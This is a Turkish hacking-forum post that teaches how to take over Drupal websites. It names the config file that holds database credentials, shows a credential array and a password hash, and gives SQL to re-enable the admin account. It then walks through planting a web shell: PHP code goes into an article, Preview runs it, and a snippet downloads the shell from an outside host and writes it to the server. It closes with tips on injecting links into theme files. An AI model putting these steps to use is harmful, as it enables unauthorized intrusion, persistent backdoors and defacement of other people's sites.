Uyarı!

Sistemimizden daha iyi faydalanabilmek için Üye Olmanız yada Giriş Yapmanız gerekmektedir. yada Şifremi Unuttum tıkla

Kozmoz / Güvenlik / Drupal detayları 09.01.2017

Drupal siteler önceden güvenilir bir cms olarak ön planda idi ancak son senelerde birçok açığı tespit edildi , otomatik şifre resetleyiciye kadar (eski token açığı gibi)..

Drupal sitelerin config dosyaları biraz şaşırtıcıdır , db adı şifre gibi bilgileri array içinde yer alır , config dosyasının bulunduğu konum ise şöyledir /sites/default/settings.php

örnek config kısmı

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'amis2min_amisdb',
      'username' => 'amis2min_amisdb',
      'password' => 'amisdb',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

örnek drupalşifre hash : $S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu = admin

mysql execute ile adminin üyeliğinin yasağını kaldırmak.

UPDATE users SET status = 1 WHERE uid=1;

Drupal sitelerin admin paneline girdikten sonra shell yüklemek içni herhangi bir upload alanı yoktur bu yüzden content kısmından yani makale eklenen kısımdan makale yerine shell kodlarınızı yapıştırmanız gerekir ve ayrıca text format kısmını PHP code olarak değiştirmeniz gerekir böylece shell kodlarınızı yolladığınız makale sayfasında çalıştırabilesiniz. Bazı drupal sitelerde shell kodlarını girdikten sonra sayfayı yolla demenize rağmen hata verebilir ve bir güvenlik önlemi alınmış olup makaleyi yollamanıza izin vermeyebilir , böyle durumlarda Preview (önizleme) özelliğini kullanmalısınız. Ön izleme sayesinde makaleyi yollamadan php kodunu test sayfasında çalıştırabilirsiniz , ancak bu test sayfasında shell çalıştırmanız sizin bir işinize yaramaz çünki herhangi bir butona tıkladığınız anda shell geçersiz konuma düşecektir ! bu sebepten tek çalıştırmalık bir kod hazırlamanız gerekmekte , yani preview dediğiniz anda siteye dışardan shelli çekip yüklemiş olsun , aşağıdaki örnek koda bakabilirsiniz.

$file = file_get_contents('http://w0rms.com/shell/angel.txt');
$b = fopen('angel.php', 'w');
fwrite($b,$file);
fclose($b);
print 'Başarılı ! <a href=angel.php></a>';


Drupal sitelere linkini eklemek istiyorsanız tema dosyası içinden html.tpl.php dosyasına eklemeniz yeterli olacaktır. eğer mysqldan eklemek istiyorsanız block_custom tablosu işinizi görecektir.